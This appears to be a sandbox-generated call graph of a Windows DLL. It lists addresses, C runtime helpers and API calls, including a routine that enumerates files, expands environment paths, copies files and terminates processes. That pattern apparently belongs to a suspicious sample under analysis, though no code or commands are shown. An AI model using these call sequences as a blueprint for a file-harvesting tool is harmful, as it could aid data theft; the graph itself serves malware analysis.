__DllMainCRTStartup@12 43 API calls 16387->16388 16389 6fe645bc 16388->16389 16390 6fe6d5ab ___std_exception_destroy 14 API calls 16389->16390 16391 6fe645c7 16390->16391 16392 6fe61135 __DllMainCRTStartup@12 44 API calls 16391->16392 16393 6fe645de __DllMainCRTStartup@12 _strlen 16392->16393 16394 6fe61075 __DllMainCRTStartup@12 43 API calls 16393->16394 16395 6fe64636 16394->16395 16396 6fe6d5ab ___std_exception_destroy 14 API calls 16395->16396 16458 6fe66180 16416->16458 16419 6fe61135 __DllMainCRTStartup@12 44 API calls 16420 6fe61775 __DllMainCRTStartup@12 _strlen 16419->16420 16421 6fe617d8 GetProcAddress 16420->16421 16422 6fe6d5ab ___std_exception_destroy 14 API calls 16421->16422 16423 6fe617f5 16422->16423 16424 6fe61135 __DllMainCRTStartup@12 44 API calls 16423->16424 16425 6fe61806 __DllMainCRTStartup@12 _strlen 16424->16425 16426 6fe61869 GetProcAddress 16425->16426 16427 6fe6d5ab ___std_exception_destroy 14 API calls 16426->16427 16428 6fe61886 16427->16428 16429 6fe61135 __DllMainCRTStartup@12 44 API calls 16428->16429 16430 6fe61897 __DllMainCRTStartup@12 _strlen 16429->16430 16431 6fe618fa GetProcAddress 16430->16431 16432 6fe6d5ab ___std_exception_destroy 14 API calls 16431->16432 16433 6fe61917 16432->16433 16434 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16433->16434 16435 6fe61927 16434->16435 16435->16374 16459 6fe6174a GetModuleHandleW 16458->16459 16459->16419 16460->16364 13867 6fe61c1a 13868 6fe61c21 13867->13868 13869 6fe61fbf 13868->13869 13878 6fe61c2b 13868->13878 14271 6fe632d8 13869->14271 13871 6fe61c47 13872 6fe61fd2 13873 6fe632d8 __DllMainCRTStartup@12 39 API calls 13872->13873 13874 6fe61fe1 13873->13874 14274 6fe64ad5 13874->14274 13877 6fe61fa5 FindNextFileW 13877->13871 13877->13878 13878->13871 13878->13877 13887 6fe61d10 __DllMainCRTStartup@12 _strlen 13878->13887 13902 6fe61075 13878->13902 13905 6fe61b85 13878->13905 13879 6fe61ffc 13881 6fe61075 __DllMainCRTStartup@12 43 API calls 13883 6fe61f5e TerminateProcess CloseHandle CloseHandle 13881->13883 14228 6fe62004 13883->14228 13886 6fe61075 __DllMainCRTStartup@12 43 API calls 13886->13887 13887->13881 13887->13886 13943 6fe61135 13887->13943 13946 6fe6d5ab 13887->13946 13893 6fe632d8 39 API calls __DllMainCRTStartup@12 13898 6fe61db2 13893->13898 13895 6fe63389 __DllMainCRTStartup@12 40 API calls 13895->13898 13896 6fe633f1 40 API calls __DllMainCRTStartup@12 13896->13898 13898->13893 13898->13895 13898->13896 13900 6fe61075 __DllMainCRTStartup@12 43 API calls 13898->13900 13953 6fe63854 13898->13953 13956 6fe632f1 13898->13956 13960 6fe632c2 13898->13960 13963 6fe616ba 13898->13963 13967 6fe62430 CoInitialize 13898->13967 13901 6fe61e9a CopyFileW TerminateProcess CloseHandle CloseHandle 13900->13901 13901->13878 14281 6fe61035 13902->14281 13906 6fe61bca __DllMainCRTStartup@12 13905->13906 13907 6fe61075 __DllMainCRTStartup@12 43 API calls 13906->13907 13908 6fe61bfd FindFirstFileW 13907->13908 13909 6fe61c21 13908->13909 13910 6fe61fbf 13909->13910 13920 6fe61c2b 13909->13920 13911 6fe632d8 __DllMainCRTStartup@12 39 API calls 13910->13911 13913 6fe61fd2 13911->13913 13912 6fe61c47 13912->13878 13914 6fe632d8 __DllMainCRTStartup@12 39 API calls 13913->13914 13915 6fe61fe1 13914->13915 13917 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13915->13917 13916 6fe61075 __DllMainCRTStartup@12 43 API calls 13916->13920 13919 6fe61ffc 13917->13919 13918 6fe61fa5 FindNextFileW 13918->13912 13918->13920 13919->13878 13920->13912 13920->13916 13920->13918 13921 6fe61b85 __DllMainCRTStartup@12 92 API calls 13920->13921 13928 6fe61d10 __DllMainCRTStartup@12 _strlen 13920->13928 13921->13920 13922 6fe61075 __DllMainCRTStartup@12 43 API calls 13924 6fe61f5e TerminateProcess CloseHandle CloseHandle 13922->13924 13923 6fe61135 __DllMainCRTStartup@12 44 API calls 13923->13928 13925 6fe62004 __DllMainCRTStartup@12 81 API calls 13924->13925 13926 6fe61fa3 13925->13926 13926->13918 13927 6fe61075 __DllMainCRTStartup@12 43 API calls 13927->13928 13928->13922 13928->13923 13928->13927 13929 6fe6d5ab ___std_exception_destroy 14 API calls 13928->13929 13930 6fe61d89 ExpandEnvironmentStringsW 13929->13930 13931 6fe63389 __DllMainCRTStartup@12 40 API calls 13930->13931 13940 6fe61db2 13931->13940 13932 6fe63854 __DllMainCRTStartup@12 40 API calls 13932->13940 13933 6fe632f1 __DllMainCRTStartup@12 39 API calls 13933->13940 13934 6fe632d8 39 API calls __DllMainCRTStartup@12 13934->13940 13935 6fe632c2 __DllMainCRTStartup@12 40 API calls 13935->13940 13936 6fe63389 __DllMainCRTStartup@12 40 API calls 13936->13940 13937 6fe633f1 40 API calls __DllMainCRTStartup@12 13937->13940 13938 6fe616ba __DllMainCRTStartup@12 39 API calls 13938->13940 13939 6fe62430 __DllMainCRTStartup@12 78 API calls 13939->13940 13940->13932 13940->13933 13940->13934 13940->13935 13940->13936 13940->13937 13940->13938 13940->13939 13941 6fe61075 __DllMainCRTStartup@12 43 API calls 13940->13941 13942 6fe61e9a CopyFileW TerminateProcess CloseHandle CloseHandle 13941->13942 13942->13920 14812 6fe610f5 13943->14812 13947 6fe70444 ___free_lconv_mon 14 API calls 13946->13947 13948 6fe61d89 ExpandEnvironmentStringsW 13947->13948 13949 6fe63389 13948->13949 13950 6fe633bb __DllMainCRTStartup@12 13949->13950 14992 6fe638b4 13950->14992 15104 6fe63cbc 13953->15104 13955 6fe63869 __DllMainCRTStartup@12 13955->13898 13957 6fe63302 __DllMainCRTStartup@12 13956->13957 13959 6fe63308 __DllMainCRTStartup@12 13957->13959 15155 6fe634ca 13957->15155 13959->13898 15159 6fe6329b 13960->15159 13964 6fe616ca __DllMainCRTStartup@12 13963->13964 13965 6fe632d8 __DllMainCRTStartup@12 39 API calls 13964->13965 13966 6fe6171a 13965->13966 13966->13898 13968 6fe62491 13967->13968 13969 6fe6249a 13968->13969 13970 6fe624eb 13968->13970 15180 6fe610c5 13969->15180 15184 6fe633f1 13970->15184 13978 6fe632d8 __DllMainCRTStartup@12 39 API calls 13979 6fe624c5 13978->13979 13981 6fe632d8 __DllMainCRTStartup@12 39 API calls 13979->13981 13980 6fe62519 15196 6fe61654 VariantInit 13980->15196 13983 6fe624d1 13981->13983 13985 6fe632d8 __DllMainCRTStartup@12 39 API calls 13983->13985 13984 6fe6253e 15197 6fe61654 VariantInit 13984->15197 14050 6fe624e0 13985->14050 13987 6fe62563 15198 6fe61654 VariantInit 13987->15198 13989 6fe62588 15199 6fe616a8 VariantClear 13989->15199 13990 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13991 6fe6325d 13990->13991 13991->13898 13993 6fe625fb 15200 6fe616a8 VariantClear 13993->15200 13995 6fe6260a 15201 6fe616a8 VariantClear 13995->15201 13997 6fe62619 14050->13990 15458 6fe6cd5b 14228->15458 14231 6fe62065 14233 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14231->14233 14235 6fe61fa3 14233->14235 14235->13877 14240 6fe6cd5b __DllMainCRTStartup@12 42 API calls 14241 6fe6208f ___std_exception_copy 14240->14241 15486 6fe6db99 14241->15486 14243 6fe620bb __DllMainCRTStartup@12 15489 6fe6cb0d 14243->15489 14272 6fe634ca __DllMainCRTStartup@12 39 API calls 14271->14272 14273 6fe632e7 __DllMainCRTStartup@12 14272->14273 14273->13872 14275 6fe64ade IsProcessorFeaturePresent 14274->14275 14276 6fe64add 14274->14276 14278 6fe64f19 14275->14278 14276->13879 16035 6fe64edc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14278->16035 14280 6fe64ffc 14280->13879 14282 6fe6104e __vfwprintf_l 14281->14282 14285 6fe6c76c 14282->14285 14286 6fe6c780 __vfwprintf_l 14285->14286 14291 6fe685e0 14286->14291 14292 6fe6860f 14291->14292 14293 6fe685ec 14291->14293 14298 6fe68636 14292->14298 14314 6fe683be 14292->14314 14305 6fe6de7c 14293->14305 14295 6fe6de7c __vfwprintf_l 29 API calls 14297 6fe68607 14295->14297 14299 6fe67d4e 14297->14299 14298->14295 14298->14297 14300 6fe67d5a 14299->14300 14301 6fe68197 __vfwprintf_l 39 API calls 14300->14301 14303 6fe67d71 14300->14303 14301->14303 14302 6fe61058 14302->13878 14303->14302 14304 6fe68197 __vfwprintf_l 39 API calls 14303->14304 14304->14302 14306 6fe6de93 14305->14306 14307 6fe6de8c 14305->14307 14311 6fe6dea1 14306->14311 14329 6fe6dcd4 14306->14329 14325 6fe68151 GetLastError 14307->14325 14310 6fe6dec8 14310->14311 14332 6fe6df26 IsProcessorFeaturePresent 14310->14332 14311->14297 14313 6fe6def8 14315 6fe6840d 14314->14315 14316 6fe683ea 14314->14316 14315->14316 14320 6fe68415 __DllMainCRTStartup@12 14315->14320 14317 6fe6de7c __vfwprintf_l 29 API calls 14316->14317 14318 6fe68402 14317->14318 14319 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14318->14319 14321 6fe6853f 14319->14321 14467 6fe6a9ff 14320->14467 14321->14298 14326 6fe6816a 14325->14326 14336 6fe6f699 14326->14336 14330 6fe6dcdf GetLastError SetLastError 14329->14330 14331 6fe6dcf8 14329->14331 14330->14310 14331->14310 14333 6fe6df32 14332->14333 14461 6fe6dcfd 14333->14461 14337 6fe6f6ac 14336->14337 14341 6fe6f6b2 14336->14341 14358 6fe71930 14337->14358 14357 6fe68182 SetLastError 14341->14357 14363 6fe7196f 14341->14363 14344 6fe6f6e4 14347 6fe7196f __dosmaperr 6 API calls 14344->14347 14345 6fe6f6f9 14346 6fe7196f __dosmaperr 6 API calls 14345->14346 14349 6fe6f705 14346->14349 14348 6fe6f6f0 14347->14348 14375 6fe70444 14348->14375 14350 6fe6f718 14349->14350 14351 6fe6f709 14349->14351 14381 6fe6f299 14350->14381 14353 6fe7196f __dosmaperr 6 API calls 14351->14353 14353->14348 14356 6fe70444 ___free_lconv_mon 14 API calls 14356->14357 14357->14306 14386 6fe717ce 14358->14386 14360 6fe7194c 14361 6fe71967 TlsGetValue 14360->14361 14362 6fe71955 14360->14362 14362->14341 14364 6fe717ce __dosmaperr 5 API calls 14363->14364 14365 6fe7198b 14364->14365 14366 6fe6f6cc 14365->14366 14367 6fe719a9 TlsSetValue 14365->14367 14366->14357 14368 6fe71658 14366->14368 14373 6fe71665 __dosmaperr 14368->14373 14369 6fe716a5 14403 6fe70431 14369->14403 14370 6fe71690 RtlAllocateHeap 14371 6fe6f6dc 14370->14371 14370->14373 14371->14344 14371->14345 14373->14369 14373->14370 14400 6fe6df8f 14373->14400 14376 6fe7044f HeapFree 14375->14376 14377 6fe70479 14375->14377 14376->14377 14378 6fe70464 GetLastError 14376->14378 14377->14357 14379 6fe70471 __dosmaperr 14378->14379 14380 6fe70431 __dosmaperr 12 API calls 14379->14380 14380->14377 14435 6fe6f12d 14381->14435 14387 6fe717fe 14386->14387 14391 6fe717fa __dosmaperr 14386->14391 14387->14391 14392 6fe71703 14387->14392 14390 6fe71818 GetProcAddress 14390->14391 14391->14360 14398 6fe71714 ___vcrt_InitializeCriticalSectionEx 14392->14398 14393 6fe717aa 14393->14390 14393->14391 14394 6fe71732 LoadLibraryExW 14395 6fe717b1 14394->14395 14396 6fe7174d GetLastError 14394->14396 14395->14393 14397 6fe717c3 FreeLibrary 14395->14397 14396->14398 14397->14393 14398->14393 14398->14394 14399 6fe71780 LoadLibraryExW 14398->14399 14399->14395 14399->14398 14406 6fe6dfbb 14400->14406 14412 6fe6f5e8 GetLastError 14403->14412 14405 6fe70436 14405->14371 14407 6fe6dfc7 __FrameHandler3::FrameUnwindToState 14406->14407 14408 6fe7351f _unexpected RtlEnterCriticalSection 14407->14408 14409 6fe6dfd2 _unexpected 14408->14409 14410 6fe6e009 __dosmaperr RtlLeaveCriticalSection 14409->14410 14411 6fe6df9a 14410->14411 14411->14373 14413 6fe6f5fe 14412->14413 14414 6fe6f604 14412->14414 14415 6fe71930 __dosmaperr 6 API calls 14413->14415 14416 6fe7196f __dosmaperr 6 API calls 14414->14416 14433 6fe6f608 SetLastError 14414->14433 14415->14414 14417 6fe6f620 14416->14417 14419 6fe71658 __dosmaperr 12 API calls 14417->14419 14417->14433 14420 6fe6f635 14419->14420 14421 6fe6f64e 14420->14421 14422 6fe6f63d 14420->14422 14424 6fe7196f __dosmaperr 6 API calls 14421->14424 14423 6fe7196f __dosmaperr 6 API calls 14422->14423 14425 6fe6f64b 14423->14425 14426 6fe6f65a 14424->14426 14430 6fe70444 ___free_lconv_mon 12 API calls 14425->14430 14427 6fe6f675 14426->14427 14428 6fe6f65e 14426->14428 14431 6fe6f299 __dosmaperr 12 API calls 14427->14431 14429 6fe7196f __dosmaperr 6 API calls 14428->14429 14429->14425 14430->14433 14432 6fe6f680 14431->14432 14434 6fe70444 ___free_lconv_mon 12 API calls 14432->14434 14433->14405 14434->14433 14436 6fe6f139 __FrameHandler3::FrameUnwindToState 14435->14436 14449 6fe7351f RtlEnterCriticalSection 14436->14449 14438 6fe6f143 14450 6fe6f173 14438->14450 14441 6fe6f23f 14442 6fe6f24b __FrameHandler3::FrameUnwindToState 14441->14442 14453 6fe7351f RtlEnterCriticalSection 14442->14453 14444 6fe6f255 14454 6fe6f420 14444->14454 14446 6fe6f26d 14458 6fe6f28d 14446->14458 14449->14438 14451 6fe73567 _unexpected RtlLeaveCriticalSection 14450->14451 14452 6fe6f161 14451->14452 14452->14441 14453->14444 14455 6fe6f42f __dosmaperr 14454->14455 14456 6fe6f456 __dosmaperr 14454->14456 14455->14456 14457 6fe753c5 __dosmaperr 14 API calls 14455->14457 14456->14446 14457->14456 14459 6fe73567 _unexpected RtlLeaveCriticalSection 14458->14459 14460 6fe6f27b 14459->14460 14460->14356 14462 6fe6dd19 __fread_nolock _unexpected 14461->14462 14463 6fe6dd45 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14462->14463 14465 6fe6de16 _unexpected 14463->14465 14464 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14466 6fe6de34 GetCurrentProcess TerminateProcess 14464->14466 14465->14464 14466->14313 14479 6fe6c3ce 14467->14479 14469 6fe68496 14476 6fe6a12f 14469->14476 14470 6fe6de7c __vfwprintf_l 29 API calls 14470->14469 14471 6fe6aa1f 14471->14470 14474 6fe6aa14 __DllMainCRTStartup@12 14474->14469 14474->14471 14483 6fe6a3f1 14474->14483 14486 6fe6aef1 14474->14486 14527 6fe6b71c 14474->14527 14477 6fe70444 ___free_lconv_mon 14 API calls 14476->14477 14478 6fe6a13f 14477->14478 14478->14318 14480 6fe6c3d9 14479->14480 14481 6fe6c3f2 14479->14481 14482 6fe6de7c __vfwprintf_l 29 API calls 14480->14482 14481->14474 14482->14481 14563 6fe68a8b 14483->14563 14485 6fe6a42e 14485->14474 14487 6fe6af17 14486->14487 14488 6fe6aeff 14486->14488 14489 6fe6de7c __vfwprintf_l 29 API calls 14487->14489 14492 6fe6af58 14487->14492 14490 6fe6b7b4 14488->14490 14491 6fe6b74a 14488->14491 14488->14492 14493 6fe6af4c 14489->14493 14496 6fe6b7f3 14490->14496 14497 6fe6b7b9 14490->14497 14494 6fe6b750 14491->14494 14495 6fe6b7dc 14491->14495 14492->14474 14493->14474 14498 6fe6b755 14494->14498 14499 6fe6b781 14494->14499 14615 6fe69528 14495->14615 14500 6fe6b812 14496->14500 14501 6fe6b7f8 14496->14501 14502 6fe6b7ea 14497->14502 14503 6fe6b7bb 14497->14503 14504 6fe6b809 14498->14504 14507 6fe6b75b 14498->14507 14499->14507 14513 6fe6b7a9 14499->14513 14630 6fe6c174 14500->14630 14501->14504 14508 6fe6b7fd 14501->14508 14622 6fe6c141 14502->14622 14510 6fe6b763 14503->14510 14515 6fe6b7ca 14503->14515 14626 6fe6c1fc 14504->14626 14507->14510 14512 6fe6b77c __DllMainCRTStartup@12 14507->14512 14516 6fe6b78e 14507->14516 14508->14495 14508->14513 14525 6fe6b81d __DllMainCRTStartup@12 14510->14525 14588 6fe6bdbb 14510->14588 14512->14525 14526 6fe6b9fd 14512->14526 14633 6fe6c320 14512->14633 14513->14525 14604 6fe69847 14513->14604 14515->14495 14518 6fe6b7ce 14515->14518 14516->14525 14598 6fe6bff7 14516->14598 14518->14525 14611 6fe6c09f 14518->14611 14520 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14522 6fe6bb0e 14520->14522 14522->14474 14525->14520 14526->14525 14640 6fe7124b 14526->14640 14528 6fe6b7b4 14527->14528 14529 6fe6b74a 14527->14529 14532 6fe6b7f3 14528->14532 14533 6fe6b7b9 14528->14533 14530 6fe6b750 14529->14530 14531 6fe6b7dc 14529->14531 14534 6fe6b755 14530->14534 14535 6fe6b781 14530->14535 14542 6fe69528 __DllMainCRTStartup@12 30 API calls 14531->14542 14536 6fe6b812 14532->14536 14537 6fe6b7f8 14532->14537 14538 6fe6b7ea 14533->14538 14539 6fe6b7bb 14533->14539 14540 6fe6b809 14534->14540 14544 6fe6b75b 14534->14544 14535->14544 14547 6fe6b7a9 14535->14547 14541 6fe6c174 __DllMainCRTStartup@12 30 API calls 14536->14541 14537->14540 14545 6fe6b7fd 14537->14545 14543 6fe6c141 __DllMainCRTStartup@12 30 API calls 14538->14543 14546 6fe6b763 14539->14546 14551 6fe6b7ca 14539->14551 14548 6fe6c1fc __DllMainCRTStartup@12 39 API calls 14540->14548 14558 6fe6b77c __DllMainCRTStartup@12 14541->14558 14542->14558 14543->14558 14544->14546 14550 6fe6b78e 14544->14550 14544->14558 14545->14531 14545->14547 14549 6fe6bdbb __DllMainCRTStartup@12 42 API calls 14546->14549 14561 6fe6b81d __DllMainCRTStartup@12 14546->14561 14552 6fe69847 __DllMainCRTStartup@12 30 API calls 14547->14552 14547->14561 14548->14558 14549->14558 14554 6fe6bff7 __DllMainCRTStartup@12 40 API calls 14550->14554 14550->14561 14551->14531 14553 6fe6b7ce 14551->14553 14552->14558 14556 6fe6c09f __vfwprintf_l 29 API calls 14553->14556 14553->14561 14554->14558 14555 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14557 6fe6bb0e 14555->14557 14556->14558 14557->14474 14559 6fe6c320 __vfwprintf_l 39 API calls 14558->14559 14558->14561 14562 6fe6b9fd 14558->14562 14559->14562 14560 6fe7124b __wsopen_s 40 API calls 14560->14562 14561->14555 14562->14560 14562->14561 14573 6fe6c37b 14563->14573 14565 6fe68ab6 14567 6fe6de7c __vfwprintf_l 29 API calls 14565->14567 14572 6fe68ad1 __vfwprintf_l 14567->14572 14568 6fe68ae9 14569 6fe68de8 14568->14569 14580 6fe6c2ee 14568->14580 14570 6fe6c2ee __DllMainCRTStartup@12 39 API calls 14569->14570 14570->14572 14572->14485 14574 6fe68aa1 14573->14574 14575 6fe6c380 14573->14575 14574->14565 14574->14568 14574->14572 14576 6fe70431 __dosmaperr 14 API calls 14575->14576 14577 6fe6c385 14576->14577 14586 6fe6def9 14577->14586 14581 6fe6c303 14580->14581 14582 6fe6c318 14580->14582 14581->14582 14583 6fe70431 __dosmaperr 14 API calls 14581->14583 14582->14569 14584 6fe6c30d 14583->14584 14585 6fe6def9 ___std_exception_copy 39 API calls 14584->14585 14585->14582 14587 6fe6de45 ___std_exception_copy 39 API calls 14586->14587 14589 6fe6bddc 14588->14589 14652 6fe686ab 14589->14652 14591 6fe6be1e __vfwprintf_l 14663 6fe70f60 14591->14663 14594 6fe6c320 __vfwprintf_l 39 API calls 14595 6fe6bed4 __vfwprintf_l 14594->14595 14596 6fe6c320 __vfwprintf_l 39 API calls 14595->14596 14597 6fe6bf10 __vfwprintf_l 14595->14597 14596->14597 14597->14512 14597->14597 14599 6fe6c024 __DllMainCRTStartup@12 14598->14599 14600 6fe6c040 14599->14600 14601 6fe6c061 14599->14601 14602 6fe6c320 __vfwprintf_l 39 API calls 14599->14602 14603 6fe7124b __wsopen_s 40 API calls 14600->14603 14601->14512 14602->14600 14603->14601 14605 6fe6985c __vfwprintf_l 14604->14605 14606 6fe6987e 14605->14606 14608 6fe698a5 14605->14608 14607 6fe6de7c __vfwprintf_l 29 API calls 14606->14607 14609 6fe6989b __DllMainCRTStartup@12 14607->14609 14608->14609 14734 6fe6872c 14608->14734 14609->14512 14614 6fe6c0b5 __vfwprintf_l 14611->14614 14612 6fe6de7c __vfwprintf_l 29 API calls 14613 6fe6c0d6 14612->14613 14613->14512 14614->14612 14614->14613 14616 6fe6953d __vfwprintf_l 14615->14616 14617 6fe6955f 14616->14617 14620 6fe69586 14616->14620 14618 6fe6de7c __vfwprintf_l 29 API calls 14617->14618 14619 6fe6957c __DllMainCRTStartup@12 14618->14619 14619->14512 14620->14619 14621 6fe6872c __DllMainCRTStartup@12 15 API calls 14620->14621 14621->14619 14623 6fe6c14d 14622->14623 14745 6fe69209 14623->14745 14625 6fe6c15d 14625->14512 14627 6fe6c219 __DllMainCRTStartup@12 14626->14627 14629 6fe6c237 __vfwprintf_l 14627->14629 14752 6fe6c270 14627->14752 14629->14512 14631 6fe69847 __DllMainCRTStartup@12 30 API calls 14630->14631 14632 6fe6c189 14631->14632 14632->14512 14756 6fe68197 14633->14756 14642 6fe7125f 14640->14642 14650 6fe7126f 14640->14650 14641 6fe71294 14644 6fe712a5 14641->14644 14645 6fe712c8 14641->14645 14642->14641 14643 6fe6c320 __vfwprintf_l 39 API calls 14642->14643 14642->14650 14643->14641 14800 6fe777fc 14644->14800 14647 6fe71344 14645->14647 14648 6fe712f0 14645->14648 14645->14650 14649 6fe7488b __fread_nolock MultiByteToWideChar 14647->14649 14648->14650 14803 6fe7488b 14648->14803 14649->14650 14650->14526 14653 6fe686d2 14652->14653 14662 6fe686c0 14652->14662 14653->14662 14682 6fe7047e 14653->14682 14656 6fe686fe 14658 6fe70444 ___free_lconv_mon 14 API calls 14656->14658 14657 6fe68709 14689 6fe6a149 14657->14689 14658->14662 14661 6fe70444 ___free_lconv_mon 14 API calls 14661->14662 14662->14591 14664 6fe70f71 14663->14664 14665 6fe70f95 14663->14665 14666 6fe6de7c __vfwprintf_l 29 API calls 14664->14666 14665->14664 14667 6fe70fc8 __vfwprintf_l 14665->14667 14676 6fe6beb1 14666->14676 14668 6fe71030 14667->14668 14669 6fe71001 14667->14669 14670 6fe71059 14668->14670 14671 6fe7105e 14668->14671 14692 6fe70e04 14669->14692 14674 6fe71086 14670->14674 14675 6fe710c0 14670->14675 14700 6fe7068d 14671->14700 14677 6fe710a6 14674->14677 14678 6fe7108b 14674->14678 14727 6fe709ba 14675->14727 14676->14594 14676->14595 14720 6fe70bb1 14677->14720 14710 6fe70d35 14678->14710 14683 6fe704bc 14682->14683 14684 6fe7048c __dosmaperr 14682->14684 14686 6fe70431 __dosmaperr 14 API calls 14683->14686 14684->14683 14685 6fe704a7 RtlAllocateHeap 14684->14685 14688 6fe6df8f __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 14684->14688 14685->14684 14687 6fe686f6 14685->14687 14686->14687 14687->14656 14687->14657 14688->14684 14690 6fe70444 ___free_lconv_mon 14 API calls 14689->14690 14691 6fe68714 14690->14691 14691->14661 14693 6fe70e1a 14692->14693 14694 6fe70e25 14692->14694 14693->14676 14695 6fe6ed88 ___std_exception_copy 39 API calls 14694->14695 14696 6fe70e80 14695->14696 14697 6fe70e8a 14696->14697 14698 6fe6df26 __vfwprintf_l 11 API calls 14696->14698 14697->14676 14699 6fe70e98 14698->14699 14701 6fe706a0 14700->14701 14702 6fe706d1 14701->14702 14703 6fe706af 14701->14703 14705 6fe706e6 14702->14705 14708 6fe70739 14702->14708 14704 6fe6de7c __vfwprintf_l 29 API calls 14703->14704 14706 6fe706c7 __fread_nolock __vfwprintf_l __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem _strrchr 14704->14706 14707 6fe709ba __vfwprintf_l 41 API calls 14705->14707 14706->14676 14707->14706 14708->14706 14709 6fe6c320 __vfwprintf_l 39 API calls 14708->14709 14709->14706 14711 6fe7612b __vfwprintf_l 41 API calls 14710->14711 14712 6fe70d65 14711->14712 14713 6fe75b81 __vfwprintf_l 29 API calls 14712->14713 14714 6fe70da3 14713->14714 14715 6fe70daa 14714->14715 14716 6fe70de3 14714->14716 14717 6fe70dbc 14714->14717 14715->14676 14718 6fe70a5e __vfwprintf_l 39 API calls 14716->14718 14719 6fe70c47 __vfwprintf_l 39 API calls 14717->14719 14718->14715 14719->14715 14721 6fe7612b __vfwprintf_l 41 API calls 14720->14721 14722 6fe70be0 14721->14722 14723 6fe75b81 __vfwprintf_l 29 API calls 14722->14723 14724 6fe70c21 14723->14724 14725 6fe70c47 __vfwprintf_l 39 API calls 14724->14725 14726 6fe70c28 14724->14726 14725->14726 14726->14676 14728 6fe7612b __vfwprintf_l 41 API calls 14727->14728 14729 6fe709e4 14728->14729 14730 6fe75b81 __vfwprintf_l 29 API calls 14729->14730 14731 6fe70a32 14730->14731 14732 6fe70a5e __vfwprintf_l 39 API calls 14731->14732 14733 6fe70a39 14731->14733 14732->14733 14733->14676 14735 6fe68741 14734->14735 14736 6fe68753 14734->14736 14735->14609 14736->14735 14737 6fe7047e __fread_nolock 15 API calls 14736->14737 14738 6fe68778 14737->14738 14739 6fe68780 14738->14739 14740 6fe6878b 14738->14740 14741 6fe70444 ___free_lconv_mon 14 API calls 14739->14741 14742 6fe6a149 __vfwprintf_l 14 API calls 14740->14742 14741->14735 14743 6fe68796 14742->14743 14744 6fe70444 ___free_lconv_mon 14 API calls 14743->14744 14744->14735 14746 6fe6921e __vfwprintf_l 14745->14746 14747 6fe69267 14746->14747 14748 6fe69240 14746->14748 14750 6fe6925d __DllMainCRTStartup@12 14747->14750 14751 6fe6872c __DllMainCRTStartup@12 15 API calls 14747->14751 14749 6fe6de7c __vfwprintf_l 29 API calls 14748->14749 14749->14750 14750->14625 14751->14750 14753 6fe6c283 14752->14753 14755 6fe6c28a __vfwprintf_l 14752->14755 14754 6fe6c320 __vfwprintf_l 39 API calls 14753->14754 14754->14755 14755->14629 14757 6fe681a1 14756->14757 14758 6fe681aa 14756->14758 14759 6fe68151 __vfwprintf_l 16 API calls 14757->14759 14763 6fe704f9 14758->14763 14760 6fe681a6 14759->14760 14760->14758 14771 6fe6ed44 14760->14771 14764 6fe6c34d 14763->14764 14765 6fe70510 14763->14765 14767 6fe70557 14764->14767 14765->14764 14782 6fe75611 14765->14782 14768 6fe6c35a 14767->14768 14769 6fe7056e 14767->14769 14768->14526 14769->14768 14795 6fe7455a 14769->14795 14772 6fe74c7b _unexpected RtlEnterCriticalSection RtlLeaveCriticalSection 14771->14772 14773 6fe6ed49 14772->14773 14774 6fe74cc0 _unexpected 38 API calls 14773->14774 14778 6fe6ed54 14773->14778 14774->14778 14775 6fe6ed7d 14777 6fe6e4c9 _unexpected 21 API calls 14775->14777 14776 6fe6ed5e IsProcessorFeaturePresent 14779 6fe6ed6a 14776->14779 14780 6fe6ed87 14777->14780 14778->14775 14778->14776 14781 6fe6dcfd _unexpected 8 API calls 14779->14781 14781->14775 14783 6fe7561d __FrameHandler3::FrameUnwindToState 14782->14783 14784 6fe6f497 _unexpected 39 API calls 14783->14784 14785 6fe75626 14784->14785 14786 6fe7351f _unexpected RtlEnterCriticalSection 14785->14786 14792 6fe7566c 14785->14792 14787 6fe75644 14786->14787 14788 6fe75692 __vfwprintf_l 14 API calls 14787->14788 14789 6fe75655 14788->14789 14790 6fe75671 __vfwprintf_l RtlLeaveCriticalSection 14789->14790 14791 6fe75668 14790->14791 14791->14792 14793 6fe6ed44 CallUnexpected 39 API calls 14791->14793 14792->14764 14794 6fe75691 14793->14794 14796 6fe6f497 _unexpected 39 API calls 14795->14796 14797 6fe7455f 14796->14797 14798 6fe74472 __vfwprintf_l 39 API calls 14797->14798 14799 6fe7456a 14798->14799 14799->14768 14806 6fe798ef 14800->14806 14810 6fe747f3 14803->14810 14807 6fe7991d __vfwprintf_l 14806->14807 14808 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14807->14808 14809 6fe77817 14808->14809 14809->14650 14811 6fe74804 MultiByteToWideChar 14810->14811 14811->14650 14813 6fe6110e __vfwprintf_l 14812->14813 14816 6fe6c72b 14813->14816 14817 6fe6c73f __vfwprintf_l 14816->14817 14822 6fe68541 14817->14822 14820 6fe67d4e __vfwprintf_l 39 API calls 14821 6fe61118 14820->14821 14821->13887 14823 6fe68570 14822->14823 14824 6fe6854d 14822->14824 14829 6fe68597 14823->14829 14830 6fe6824a 14823->14830 14825 6fe6de7c __vfwprintf_l 29 API calls 14824->14825 14828 6fe68568 14825->14828 14826 6fe6de7c __vfwprintf_l 29 API calls 14826->14828 14828->14820 14829->14826 14829->14828 14831 6fe68276 14830->14831 14832 6fe68299 14830->14832 14833 6fe6de7c __vfwprintf_l 29 API calls 14831->14833 14832->14831 14834 6fe682a1 __vfwprintf_l 14832->14834 14840 6fe6828e 14833->14840 14841 6fe6a71b 14834->14841 14835 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14836 6fe683bc 